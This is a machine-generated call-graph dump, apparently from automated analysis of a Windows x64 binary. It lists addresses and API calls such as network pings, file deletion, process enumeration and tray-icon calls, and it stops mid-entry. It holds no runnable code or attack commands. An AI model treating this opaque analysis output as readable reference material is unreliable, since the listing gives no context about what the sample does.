7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 92753->93314 93315 7ff73d065454 92753->93315 93318 7ff73d0655fc EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92753->93318 93319 7ff73d04ca8c 45 API calls 92753->93319 93320 7ff73d0c401c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92753->93320 92754->92753 92755->92674 92756->92651 92758 7ff73d04b1ff 92757->92758 92771 7ff73d04b1e6 92757->92771 92759 7ff73d04b207 92758->92759 92760 7ff73d04b232 92758->92760 93327 7ff73d069afc 31 API calls 92759->93327 92762 7ff73d04b244 92760->92762 92768 7ff73d098014 92760->92768 92770 7ff73d09811c 92760->92770 93328 7ff73d064d3c 47 API calls 92762->93328 92764 7ff73d04b216 92769 7ff73d04c848 4 API calls 92764->92769 92766 7ff73d098134 92772 7ff73d0651a8 4 API calls 92768->92772 92775 7ff73d098096 Concurrency::wait wcscpy 92768->92775 92769->92771 93330 7ff73d069ac8 31 API calls 92770->93330 92771->92664 92773 7ff73d098062 92772->92773 92774 7ff73d04c848 4 API calls 92773->92774 92774->92775 93329 7ff73d064d3c 47 API calls 92775->93329 92776->92655 92778 7ff73d0df5b9 92777->92778 92780 7ff73d0df57f 92777->92780 92778->92780 92906 7ff73d0bf99c 92778->92906 92780->92706 92782 7ff73d04b1c0 49 API calls 92781->92782 92783 7ff73d0dcfb4 92782->92783 92801 7ff73d0dd009 Concurrency::wait 92783->92801 93019 7ff73d0ddf1c 92783->93019 92785 7ff73d0dd256 92786 7ff73d0dd3dc 92785->92786 92790 7ff73d0dd268 92785->92790 93043 7ff73d0de224 56 API calls Concurrency::wait 92786->93043 92789 7ff73d0dd3eb 92789->92790 92791 7ff73d0dd3f9 92789->92791 93031 7ff73d0dcd34 92790->93031 92791->92801 92792 7ff73d04b1c0 49 API calls 92803 7ff73d0dd073 Concurrency::wait 92792->92803 92795 7ff73d0dd288 93035 7ff73d0de424 92795->93035 92797 7ff73d0dd2a6 92798 7ff73d064eb0 SetErrorMode 92797->92798 92799 7ff73d0dd2b7 92798->92799 92800 7ff73d04bb10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92799->92800 92802 7ff73d0dd2da 92800->92802 92801->92706 92804 7ff73d0537f0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92802->92804 92812 7ff73d0dd300 92802->92812 92803->92785 92803->92792 92803->92801 93041 7ff73d0b19a4 4 API calls 2 library calls 92803->93041 93042 7ff73d0dd49c 39 API calls 3 library calls 92803->93042 92806 7ff73d0dd2f4 92804->92806 92805 7ff73d0dd44a 92805->92801 92807 7ff73d0dd460 FreeLibrary 92805->92807 92808 7ff73d0ddd94 71 API calls 92806->92808 92807->92801 92808->92812 92809 7ff73d0537f0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92809->92812 92810 7ff73d0ddd94 71 API calls 92810->92812 92811 7ff73d04c98c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92811->92812 92812->92805 92812->92809 92812->92810 92812->92811 92814 7ff73d04b1c0 49 API calls 92813->92814 92815 7ff73d0c7458 92814->92815 93047 7ff73d0bc948 92815->93047 92817 7ff73d0c7461 92818 7ff73d0c7465 GetLastError 92817->92818 92819 7ff73d0c747f 92817->92819 92818->92819 92819->92706 92825 7ff73d0d3b80 92820->92825 92821 7ff73d0d3bb1 WSAStartup 92822 7ff73d0d3bed 92821->92822 92836 7ff73d0d3bc5 Concurrency::wait 92821->92836 93157 7ff73d0474fc 92822->93157 92824 7ff73d0d3bf7 92826 7ff73d04b1c0 49 API calls 92824->92826 92825->92821 92827 7ff73d0d3c06 92826->92827 92828 7ff73d05c4d4 6 API calls 92827->92828 92829 7ff73d0d3c14 inet_addr gethostbyname 92828->92829 92830 7ff73d0d3c34 IcmpCreateFile 92829->92830 92829->92836 92831 7ff73d0d3c6b 92830->92831 92830->92836 92832 7ff73d0651a8 4 API calls 92831->92832 92833 7ff73d0d3c8d 92832->92833 92834 7ff73d0d3cc6 IcmpSendEcho 92833->92834 92837 7ff73d0d3ce3 92834->92837 92835 7ff73d0d3da0 IcmpCloseHandle WSACleanup 92835->92836 92836->92706 92837->92835 92839 7ff73d04c98c 4 API calls 92838->92839 92840 7ff73d0d0164 92839->92840 92841 7ff73d0c15f0 6 API calls 92840->92841 92842 7ff73d0d016c 92841->92842 92842->92706 92846 7ff73d0df0f2 92843->92846 92844 7ff73d04b1c0 49 API calls 92845 7ff73d0df161 92844->92845 93160 7ff73d0c1530 92845->93160 92846->92844 92848 7ff73d0df104 92846->92848 92848->92706 92850 7ff73d04b1c0 49 API calls 92849->92850 92851 7ff73d0df93d 92850->92851 93213 7ff73d0bcad8 CreateToolhelp32Snapshot Process32FirstW 92851->93213 92853 7ff73d0df950 92853->92706 92855 7ff73d04b1c0 49 API calls 92854->92855 92856 7ff73d0c74c0 92855->92856 93226 7ff73d0bcac4 92856->93226 92858 7ff73d0c74cc 92858->92706 92860 7ff73d04b1c0 49 API calls 92859->92860 92861 7ff73d0634b1 92860->92861 92862 7ff73d063bbc 4 API calls 92861->92862 92865 7ff73d0634d0 Concurrency::wait 92862->92865 92863 7ff73d0693b8 wcsftime 37 API calls 92863->92865 92864 7ff73d063aaf 92864->92706 92865->92863 92865->92864 92866 7ff73d047978 4 API calls 92865->92866 92867 7ff73d05da34 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92865->92867 92870 7ff73d04b1c0 49 API calls 92865->92870 92873 7ff73d045f44 4 API calls 92865->92873 92874 7ff73d063ae8 39 API calls 92865->92874 93233 7ff73d043370 92865->93233 93243 7ff73d042e98 92865->93243 93247 7ff73d048d80 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 92865->93247 93248 7ff73d0458b0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92865->93248 92866->92865 92867->92865 92870->92865 92873->92865 92874->92865 92876 7ff73d0651a8 4 API calls 92875->92876 92877 7ff73d0d2027 92876->92877 92878 7ff73d04b1c0 49 API calls 92877->92878 92879 7ff73d0d204d GetEnvironmentVariableW 92878->92879 93286 7ff73d0c11fc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92879->93286 92881 7ff73d0d2070 Concurrency::wait 92881->92706 92883 7ff73d0d4590 92882->92883 92884 7ff73d0d45f8 92883->92884 92885 7ff73d04c98c 4 API calls 92883->92885 92884->92706 92885->92884 92887 7ff73d04b1c0 49 API calls 92886->92887 92888 7ff73d0d22e6 92887->92888 92889 7ff73d0480e0 81 API calls 92888->92889 92890 7ff73d0d22f9 92889->92890 92891 7ff73d051c90 208 API calls 92890->92891 92892 7ff73d0d2324 92890->92892 92891->92892 92894 7ff73d0d2328 92892->92894 93287 7ff73d05da34 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92892->93287 92894->92706 92897 7ff73d04c865 92896->92897 92898 7ff73d0989ca 92897->92898 92899 7ff73d0651a8 4 API calls 92897->92899 92900 7ff73d04c89d memcpy_s 92899->92900 92900->92706 92902->92701 92903->92701 92904->92706 92905->92706 92935 7ff73d0bf858 92906->92935 92908 7ff73d0bf9de 92909 7ff73d0bfa77 92908->92909 92910 7ff73d0bfa4d 92908->92910 92930 7ff73d0bf9e6 memcpy_s 92908->92930 92912 7ff73d0bfb02 92909->92912 92913 7ff73d0bfa8f 92909->92913 92951 7ff73d0bfca8 53 API calls 2 library calls 92910->92951 92916 7ff73d0bfc4a 92912->92916 92917 7ff73d0bfbb8 92912->92917 92912->92930 92914 7ff73d0bfa93 92913->92914 92915 7ff73d0bfaec 92913->92915 92940 7ff73d0c2748 92914->92940 92921 7ff73d0c14b0 4 API calls 92915->92921 92916->92930 92955 7ff73d04cc60 36 API calls 92916->92955 92918 7ff73d0bfc12 92917->92918 92919 7ff73d0bfbbd 92917->92919 92918->92930 92954 7ff73d04cc60 36 API calls 92918->92954 92922 7ff73d0bfbf1 92919->92922 92923 7ff73d0bfbc6 92919->92923 92921->92930 92922->92930 92953 7ff73d04cc60 36 API calls 92922->92953 92923->92930 92952 7ff73d04cc60 36 API calls 92923->92952 92924 7ff73d0bfa9b 92929 7ff73d0c2748 6 API calls 92924->92929 92931 7ff73d0bfab5 memcpy_s 92929->92931 92930->92780 92932 7ff73d0c2748 6 API calls 92931->92932 92933 7ff73d0bfacb 92932->92933 92944 7ff73d0c14b0 92933->92944 92936 7ff73d0bf8c2 92935->92936 92939 7ff73d0bf883 92935->92939 92936->92908 92937 7ff73d04b1c0 49 API calls 92937->92939 92939->92936 92939->92937 92956 7ff73d0693b8 92939->92956 92941 7ff73d0c2757 92940->92941 92942 7ff73d0c275c 92940->92942 92978 7ff73d0c15f0 92941->92978 92942->92924 92945 7ff73d0c14c4 92944->92945 92946 7ff73d0c14d7 92945->92946 92947 7ff73d0c14fc 92945->92947 92948 7ff73d0651a8 4 API calls 92946->92948 92949 7ff73d0651a8 4 API calls 92947->92949 92950 7ff73d0c14e2 fread_s 92948->92950 92949->92950 92950->92930 92951->92930 92952->92930 92953->92930 92954->92930 92955->92930 92957 7ff73d069434 92956->92957 92958 7ff73d0693cf 92956->92958 92975 7ff73d069328 35 API calls _mbstowcs_s_l 92957->92975 92965 7ff73d0693f3 92958->92965 92973 7ff73d07b734 15 API calls abort 92958->92973 92961 7ff73d069466 92963 7ff73d069472 92961->92963 92971 7ff73d069489 92961->92971 92962 7ff73d0693d9 92974 7ff73d07b614 31 API calls _invalid_parameter_noinfo 92962->92974 92976 7ff73d07b734 15 API calls abort 92963->92976 92965->92939 92967 7ff73d0693e4 92967->92939 92968 7ff73d069477 92977 7ff73d07b614 31 API calls _invalid_parameter_noinfo 92968->92977 92970 7ff73d073210 37 API calls wcsftime 92970->92971 92971->92970 92972 7ff73d069482 92971->92972 92972->92939 92973->92962 92974->92967 92975->92961 92976->92968 92977->92972 92979 7ff73d0c164c memcpy_s Concurrency::wait 92978->92979 92980 7ff73d0c1612 92978->92980 92979->92942 92981 7ff73d0c162e 92980->92981 92983 7ff73d0c1657 92980->92983 92984 7ff73d0c1688 92980->92984 92981->92983 92986 7ff73d0c163d 92981->92986 92982 7ff73d0651a8 4 API calls 92982->92979 92983->92982 92985 7ff73d0c16a6 Concurrency::wait 92984->92985 92987 7ff73d0651a8 4 API calls 92984->92987 92985->92979 92988 7ff73d0c16e0 92985->92988 92989 7ff73d0c16d0 92985->92989 92993 7ff73d0651a8 4 API calls 92986->92993 92987->92985 92990 7ff73d0651a8 4 API calls 92988->92990 92991 7ff73d0651a8 4 API calls 92989->92991 92992 7ff73d0c16eb 92990->92992 92991->92979 92997 7ff73d05d72c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92992->92997 92993->92979 92995 7ff73d0c16fb 92998 7ff73d05c4d4 WideCharToMultiByte 92995->92998 92997->92995 92999 7ff73d0a0e78 92998->92999 93000 7ff73d05c525 92998->93000 93018 7ff73d05d700 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92999->93018 93002 7ff73d0651a8 4 API calls 93000->93002 93004 7ff73d05c52d WideCharToMultiByte 93002->93004 93003 7ff73d0a0e80 93007 7ff73d05c58c 93004->93007 93006 7ff73d05c566 Concurrency::wait 93006->92979 93008 7ff73d05c5ae 93007->93008 93009 7ff73d05c5f6 93007->93009 93008->93009 93011 7ff73d05c5b3 93008->93011 93010 7ff73d0bbcb0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93009->93010 93013 7ff73d05c5cd memcpy_s 93010->93013 93012 7ff73d05c5c2 93011->93012 93015 7ff73d0a0e86 93011->93015 93014 7ff73d05c600 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93012->93014 93013->93006 93014->93013 93016 7ff73d0651a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93015->93016 93017 7ff73d0a0ebf 93016->93017 93018->93003 93020 7ff73d0489fc 4 API calls 93019->93020 93021 7ff73d0ddf4f CharLowerBuffW 93020->93021 93027 7ff73d0ddf6c 93021->93027 93023 7ff73d0472b8 4 API calls 93024 7ff73d0de032 93023->93024 93044 7ff73d045ff4 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93024->93044 93026 7ff73d0de04c 93028 7ff73d04ba94 4 API calls 93026->93028 93027->93023 93030 7ff73d0de05b Concurrency::wait 93027->93030 93028->93030 93029 7ff73d0de17e Concurrency::wait 93029->92803 93030->93029 93045 7ff73d0dd49c 39 API calls 3 library calls 93030->93045 93032 7ff73d0dcd8a 93031->93032 93033 7ff73d0dcd67 93031->93033 93032->92795 93034 7ff73d0651a8 4 API calls 93033->93034 93034->93032 93036 7ff73d0de76d 93035->93036 93037 7ff73d0de462 Concurrency::wait wcscpy 93035->93037 93037->93036 93038 7ff73d04cc60 36 API calls 93037->93038 93039 7ff73d04b1c0 49 API calls 93037->93039 93046 7ff73d0bed38 6 API calls 93037->93046 93038->93037 93039->93037 93041->92803 93042->92803 93043->92789 93044->93026 93045->93029 93046->93037 93048 7ff73d0472b8 4 API calls 93047->93048 93049 7ff73d0bc97c 93048->93049 93050 7ff73d0472b8 4 API calls 93049->93050 93051 7ff73d0bc986 93050->93051 93052 7ff73d0472b8 4 API calls 93051->93052 93053 7ff73d0bc990 93052->93053 93072 7ff73d05d3f4 93053->93072 93058 7ff73d0bc9bc 93084 7ff73d04533c 93058->93084 93059 7ff73d045624 4 API calls 93059->93058 93061 7ff73d0bc9d8 FindFirstFileW 93062 7ff73d0bca5f FindClose 93061->93062 93063 7ff73d0bc9f3 93061->93063 93068 7ff73d0bca6b Concurrency::wait 93062->93068 93063->93062 93066 7ff73d0bc9f9 93063->93066 93064 7ff73d0bca3e FindNextFileW 93064->93063 93064->93066 93065 7ff73d04609c 4 API calls 93065->93066 93066->93063 93066->93064 93066->93065 93069 7ff73d045624 4 API calls 93066->93069 93129 7ff73d045e74 93066->93129 93068->92817 93070 7ff73d0bca2e DeleteFileW 93069->93070 93070->93064 93071 7ff73d0bca54 FindClose 93070->93071 93071->93068 93138 7ff73d089520 93072->93138 93075 7ff73d0a1716 93077 7ff73d0489a4 4 API calls 93075->93077 93076 7ff73d05d432 93078 7ff73d045f44 4 API calls 93076->93078 93079 7ff73d05d43c 93077->93079 93078->93079 93079->93079 93080 7ff73d04ba94 4 API calls 93079->93080 93081 7ff73d05d4a5 93080->93081 93082 7ff73d0bdca4 GetFileAttributesW 93081->93082 93083 7ff73d0bc9a7 93082->93083 93083->93058 93083->93059 93085 7ff73d0472b8 4 API calls 93084->93085 93086 7ff73d045374 93085->93086 93087 7ff73d0472b8 4 API calls 93086->93087 93088 7ff73d04537d 93087->93088 93089 7ff73d0472b8 4 API calls 93088->93089 93090 7ff73d045386 93089->93090 93091 7ff73d0472b8 4 API calls 93090->93091 93093 7ff73d04538f 93091->93093 93092 7ff73d045401 93092->93061 93093->93092 93094 7ff73d045417 93093->93094 93095 7ff73d08b306 93093->93095 93140 7ff73d045ff4 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93094->93140 93097 7ff73d04609c 4 API calls 93095->93097 93099 7ff73d08b30b 93097->93099 93098 7ff73d045423 93100 7ff73d04ba94 4 API calls 93098->93100 93101 7ff73d0489a4 4 API calls 93099->93101 93103 7ff73d045433 93100->93103 93102 7ff73d045482 93101->93102 93102->93061 93103->93102 93108 7ff73d0454ae 93103->93108 93141 7ff73d045ff4 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93103->93141 93105 7ff73d045543 93109 7ff73d04609c 4 API calls 93105->93109 93111 7ff73d04554c 93105->93111 93106 7ff73d04549f 93107 7ff73d04ba94 4 API calls 93106->93107 93107->93108 93108->93105 93110 7ff73d0454d4 93108->93110 93126 7ff73d08b338 93108->93126 93109->93111 93110->93105 93142 7ff73d04778c 93110->93142 93114 7ff73d04609c 4 API calls 93111->93114 93128 7ff73d045559 Concurrency::wait 93111->93128 93116 7ff73d08b493 93114->93116 93117 7ff73d045f44 4 API calls 93125 7ff73d08b41d 93117->93125 93118 7ff73d04550b 93146 7ff73d045ff4 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93118->93146 93120 7ff73d045521 93121 7ff73d045532 93120->93121 93123 7ff73d04609c 4 API calls 93120->93123 93121->93105 93124 7ff73d04609c 4 API calls 93121->93124 93122 7ff73d04778c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93122->93125 93123->93121 93124->93105 93125->93118 93125->93122 93147 7ff73d048d80 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93125->93147 93126->93117 93128->93061 93130 7ff73d08b628 93129->93130 93131 7ff73d045e86 93129->93131 93156 7ff73d0ad134 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93130->93156 93148 7ff73d045e98 93131->93148 93134 7ff73d045e92 93134->93066 93135 7ff73d08b635 93136 7ff73d04609c 4 API calls 93135->93136 93137 7ff73d08b640 Concurrency::wait 93136->93137 93139 7ff73d05d409 GetFullPathNameW 93138->93139 93139->93075 93139->93076 93140->93098 93141->93106 93143 7ff73d0489fc 4 API calls 93142->93143 93144 7ff73d0454e9 93143->93144 93144->93105 93145 7ff73d045ff4 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93144->93145 93145->93118 93146->93120 93147->93125 93150 7ff73d045ec3 93148->93150 93153 7ff73d045efb memcpy_s 93148->93153 93149 7ff73d08b660 93154 7ff73d0651a8 4 API calls 93149->93154 93150->93149 93151 7ff73d045eec 93150->93151 93150->93153 93152 7ff73d049608 4 API calls 93151->93152 93152->93153 93153->93134 93155 7ff73d08b6b0 memcpy_s 93154->93155 93156->93135 93158 7ff73d0651a8 4 API calls 93157->93158 93159 7ff73d047518 93158->93159 93159->92824 93161 7ff73d0c1559 93160->93161 93166 7ff73d0bf1a8 93161->93166 93163 7ff73d0c15ae 93165 7ff73d0c15bc Concurrency::wait 93163->93165 93181 7ff73d0ac054 93163->93181 93165->92848 93167 7ff73d0489fc 4 API calls 93166->93167 93168 7ff73d0bf1cf CharLowerBuffW 93167->93168 93184 7ff73d0bf910 93168->93184 93170 7ff73d0bf1e3 93171 7ff73d04778c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93170->93171 93172 7ff73d0bf2f6 Concurrency::wait fread_s 93170->93172 93173 7ff73d0bf22c 93170->93173 93171->93170 93172->93163 93174 7ff73d04778c 4 API calls 93173->93174 93176 7ff73d0bf23e 93173->93176 93174->93176 93175 7ff73d0651a8 4 API calls 93177 7ff73d0bf26c 93175->93177 93176->93175 93188 7ff73d0bf364 93177->93188 93179 7ff73d0bf2f2 93179->93172 93180 7ff73d0651a8 4 API calls 93179->93180 93180->93172 93182 7ff73d0bf910 15 API calls 93181->93182 93183 7ff73d0ac062 Concurrency::wait 93182->93183 93183->93165 93185 7ff73d0bf926 93184->93185 93187 7ff73d0bf93e Concurrency::wait 93184->93187 93203 7ff73d047af4 93185->93203 93187->93170 93189 7ff73d0472b8 4 API calls 93188->93189 93190 7ff73d0bf3b5 93189->93190 93191 7ff73d0472b8 4 API calls 93190->93191 93192 7ff73d0bf3be 93191->93192 93193 7ff73d0472b8 4 API calls 93192->93193 93197 7ff73d0bf3c7 93193->93197 93194 7ff73d045f44 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93194->93197 93195 7ff73d0bf6b1 Concurrency::wait 93195->93179 93196 7ff73d06ad9c 36 API calls 93196->93197 93197->93194 93197->93195 93197->93196 93198 7ff73d0bf364 38 API calls 93197->93198 93199 7ff73d0bf7ec 93197->93199 93200 7ff73d048d80 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93197->93200 93202 7ff73d04609c 4 API calls 93197->93202 93198->93197 93201 7ff73d0bf910 15 API calls 93199->93201 93200->93197 93201->93195 93202->93197 93204 7ff73d047af9 93203->93204 93205 7ff73d047b2e 93203->93205 93204->93205 93207 7ff73d07b950 93204->93207 93205->93187 93208 7ff73d07b955 RtlRestoreThreadPreferredUILanguages 93207->93208 93212 7ff73d07b985 __free_lconv_num 93207->93212 93209 7ff73d07b970 93208->93209 93208->93212 93210 7ff73d07b734 fread_s 13 API calls 93209->93210 93211 7ff73d07b975 GetLastError 93210->93211 93211->93212 93212->93204 93214 7ff73d0bcb3b 93213->93214 93223 7ff73d0bcb57 Concurrency::wait 93214->93223 93224 7ff73d06adc8 36 API calls _snwprintf 93214->93224 93216 7ff73d0bcc2a FindCloseChangeNotification 93216->92853 93217 7ff73d0bcb67 Process32NextW 93217->93216 93217->93223 93218 7ff73d0472b8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93218->93223 93219 7ff73d04c848 4 API calls 93219->93223 93220 7ff73d04533c 4 API calls 93220->93223 93221 7ff73d045e74 4 API calls 93221->93223 93223->93216 93223->93217 93223->93218 93223->93219 93223->93220 93223->93221 93225 7ff73d0618a0 CompareStringW 93223->93225 93224->93223 93225->93223 93229 7ff73d0bd4a8 GetFileAttributesW 93226->93229 93230 7ff73d0bd4bf FindFirstFileW 93229->93230 93231 7ff73d0bcacd 93229->93231 93230->93231 93232 7ff73d0bd4d8 FindClose 93230->93232 93231->92858 93232->93231 93234 7ff73d04339f fread_s 93233->93234 93249 7ff73d0432d4 93234->93249 93237 7ff73d043445 93239 7ff73d043466 Shell_NotifyIconW 93237->93239 93240 7ff73d08ab3e Shell_NotifyIconW 93237->93240 93253 7ff73d044620 93239->93253 93242 7ff73d04347d 93242->92865 93244 7ff73d042ea9 fread_s 93243->93244 93245 7ff73d042ef4 93243->93245 93246 7ff73d042ec8 Shell_NotifyIconW 93244->93246 93245->92865 93246->93245 93247->92865 93248->92865 93250 7ff73d0432fe 93249->93250 93251 7ff73d0432ec 93249->93251 93250->93251 93252 7ff73d043304 DestroyIcon 93250->93252 93251->93237 93283 7ff73d0bba6c 39 API calls wcsftime 93251->93283 93252->93251 93254 7ff73d04464c 93253->93254 93273 7ff73d044728 Concurrency::wait 93253->93273 93255 7ff73d047978 4 API calls 93254->93255 93256 7ff73d04465b 93255->93256 93257 7ff73d044668 93256->93257 93258 7ff73d08af22 LoadStringW 93256->93258 93259 7ff73d045f44 4 API calls 93257->93259 93261 7ff73d08af44 93258->93261 93260 7ff73d04467c 93259->93260 93262 7ff73d044689 93260->93262 93268 7ff73d08af56 93260->93268 93263 7ff73d04609c 4 API calls 93261->93263 93262->93261 93264 7ff73d04469b 93262->93264 93269 7ff73d0446b8 wcscpy fread_s 93263->93269 93265 7ff73d045624 4 API calls 93264->93265 93266 7ff73d0446a7 93265->93266 93267 7ff73d045e74 4 API calls 93266->93267 93267->93269 93268->93269 93270 7ff73d0472b8 4 API calls 93268->93270 93281 7ff73d08af9d Concurrency::wait 93268->93281 93271 7ff73d04470f Shell_NotifyIconW 93269->93271 93272 7ff73d08af82 93270->93272 93271->93273 93284 7ff73d0b84e4 5 API calls Concurrency::wait 93272->93284 93273->93242 93276 7ff73d08af8e 93278 7ff73d045e74 4 API calls 93276->93278 93277 7ff73d08afc2 93279 7ff73d045624 4 API calls 93277->93279 93278->93281 93280 7ff73d08afd1 93279->93280 93282 7ff73d045624 4 API calls 93280->93282 93285 7ff73d064d3c 47 API calls 93281->93285 93282->93269 93283->93237 93284->93276 93285->93277 93286->92881 93287->92894 93290 7ff73d04cf1a 93288->93290 93294 7ff73d04cfa4 Concurrency::wait 93288->93294 93289 7ff73d04cf8b CharUpperBuffW 93289->93294 93291 7ff73d098e18 93290->93291 93292 7ff73d0651a8 4 API calls 93290->93292 93293 7ff73d04cf76 memcpy_s 93290->93293 93292->93293 93293->93289 93294->92753 93295->92753 93296->92730 93297->92730 93298->92730 93299->92753 93300->92753 93301->92753 93303 7ff73d04da90 45 API calls 93302->93303 93304 7ff73d04d130 93303->93304 93305 7ff73d098e22 93304->93305 93306 7ff73d04d147 93304->93306 93307 7ff73d04c98c 4 API calls 93305->93307 93308 7ff73d0651a8 4 API calls 93306->93308 93309 7ff73d04d1ab memcpy_s 93307->93309 93311 7ff73d04d16c Concurrency::wait 93308->93311 93310 7ff73d04da90 45 API calls 93309->93310 93312 7ff73d04d207 93309->93312 93310->93312 93311->93309 93313 7ff73d0651a8 4 API calls 93311->93313 93312->92753 93313->93309 93322 7ff73d065404 93315->93322 93317 7ff73d06545d 93317->92753 93319->92753 93320->92753 93321->92730 93323 7ff73d065433 93322->93323 93325 7ff73d065429 _onexit 93322->93325 93326 7ff73d07afb8 34 API calls _onexit 93323->93326 93325->93317 93326->93325 93327->92764 93328->92764 93329->92770 93330->92766 93333 7ff73d08b750 93332->93333 93334 7ff73d0460d7 93332->93334 93335 7ff73d04610c 4 API calls 93334->93335 93336 7ff73d0460e7 memcpy_s 93335->93336 93336->92617 94536 7ff73d050bc8 94539 7ff73d04dd44 94536->94539 94538 7ff73d050bd5 94540 7ff73d04dd7a 94539->94540 94546 7ff73d04dde4 94539->94546 94541 7ff73d051c90 208 API calls 94540->94541 94540->94546 94545 7ff73d04ddb1 94541->94545 94543 7ff73d09929a 94544 7ff73d04de2b 94544->94538 94545->94544 94545->94546 94547 7ff73d04609c 4 API calls 94545->94547 94546->94544 94548 7ff73d0c44e8 78 API calls 3 library calls 94546->94548 94547->94546 94548->94543 93337 7ff73d048469 93344 7ff73d048de4 93337->93344 93339 7ff73d0484b0 93341 7ff73d048790 4 API calls 93339->93341 93340 7ff73d048481 93340->93339 93342 7ff73d048790 4 API calls 93340->93342 93343 7ff73d0482aa Concurrency::wait 93341->93343 93342->93339 93345 7ff73d0489a4 4 API calls 93344->93345 93347 7ff73d048e16 93345->93347 93348 7ff73d048e99 93347->93348 93350 7ff73d049608 4 API calls 93347->93350 93352 7ff73d08cdc6 93347->93352 93355 7ff73d048e8a memcpy_s 93347->93355 93356 7ff73d048d80 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93347->93356 93348->93340 93349 7ff73d08ce42 93350->93347 93353 7ff73d08cde8 93352->93353 93354 7ff73d0651a8 4 API calls 93353->93354 93354->93355 93357 7ff73d0b8128 80 API calls 3 library calls 93355->93357 93356->93347 93357->93349 94549 7ff73d0755c8 94550 7ff73d0755de 94549->94550 94551 7ff73d0755f3 94549->94551 94564 7ff73d07b734 15 API calls abort 94550->94564 94563 7ff73d06e4e4 EnterCriticalSection 94551->94563 94554 7ff73d0755e3 94565 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94554->94565 94555 7ff73d0755f8 94557 7ff73d075634 32 API calls 94555->94557 94559 7ff73d075603 94557->94559 94558 7ff73d0755ee 94560 7ff73d075618 94559->94560 94561 7ff73d07b734 fread_s 15 API calls 94559->94561 94562 7ff73d06e4f0 fflush LeaveCriticalSection 94560->94562 94561->94560 94562->94558 94564->94554 94565->94558 93358 7ff73d0481f3 93359 7ff73d048201 93358->93359 93360 7ff73d048790 4 API calls 93359->93360 93375 7ff73d048160 93360->93375 93361 7ff73d048289 93362 7ff73d048790 4 API calls 93361->93362 93364 7ff73d0482a7 Concurrency::wait 93362->93364 93363 7ff73d048ad8 38 API calls 93363->93375 93366 7ff73d08cbb5 93393 7ff73d0b8128 80 API calls 3 library calls 93366->93393 93367 7ff73d0489a4 4 API calls 93377 7ff73d048686 93367->93377 93369 7ff73d08cbe6 93394 7ff73d0b8128 80 API calls 3 library calls 93369->93394 93370 7ff73d048790 4 API calls 93370->93375 93371 7ff73d08cb9d 93392 7ff73d0b8128 80 API calls 3 library calls 93371->93392 93374 7ff73d08cb97 93374->93364 93375->93361 93375->93363 93375->93366 93375->93369 93375->93370 93375->93371 93376 7ff73d0489a4 4 API calls 93375->93376 93382 7ff73d0486cb 93375->93382 93384 7ff73d04856c 93375->93384 93387 7ff73d0485a5 memcpy_s Concurrency::wait 93375->93387 93389 7ff73d048ed0 5 API calls memcpy_s 93375->93389 93376->93375 93377->93382 93390 7ff73d048d80 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93377->93390 93378 7ff73d08cbc6 93380 7ff73d048790 4 API calls 93378->93380 93380->93374 93383 7ff73d0651a8 4 API calls 93382->93383 93388 7ff73d08cb31 93382->93388 93386 7ff73d08cac0 memcpy_s 93383->93386 93385 7ff73d0651a8 4 API calls 93384->93385 93384->93386 93384->93388 93385->93387 93386->93388 93387->93367 93387->93382 93391 7ff73d0b8128 80 API calls 3 library calls 93388->93391 93389->93375 93390->93377 93391->93374 93392->93374 93393->93378 93394->93374 94566 7ff73d09efc7 94567 7ff73d09efd1 94566->94567 94570 7ff73d0befc8 94567->94570 94571 7ff73d0beffd 94570->94571 94572 7ff73d09efdc 94571->94572 94573 7ff73d0651a8 4 API calls 94571->94573 94574 7ff73d0bf040 94573->94574 94574->94572 94575 7ff73d04609c 4 API calls 94574->94575 94575->94574 93395 7ff73d07a774 93396 7ff73d07a78d 93395->93396 93403 7ff73d07a789 93395->93403 93405 7ff73d08442c GetEnvironmentStringsW 93396->93405 93399 7ff73d07a79a 93401 7ff73d07b950 __free_lconv_num 15 API calls 93399->93401 93401->93403 93402 7ff73d07a7a7 93404 7ff73d07b950 __free_lconv_num 15 API calls 93402->93404 93404->93399 93406 7ff73d07a792 93405->93406 93407 7ff73d084450 93405->93407 93406->93399 93412 7ff73d07a8d8 31 API calls 3 library calls 93406->93412 93413 7ff73d07caac 93407->93413 93409 7ff73d084482 memcpy_s 93410 7ff73d07b950 __free_lconv_num 15 API calls 93409->93410 93411 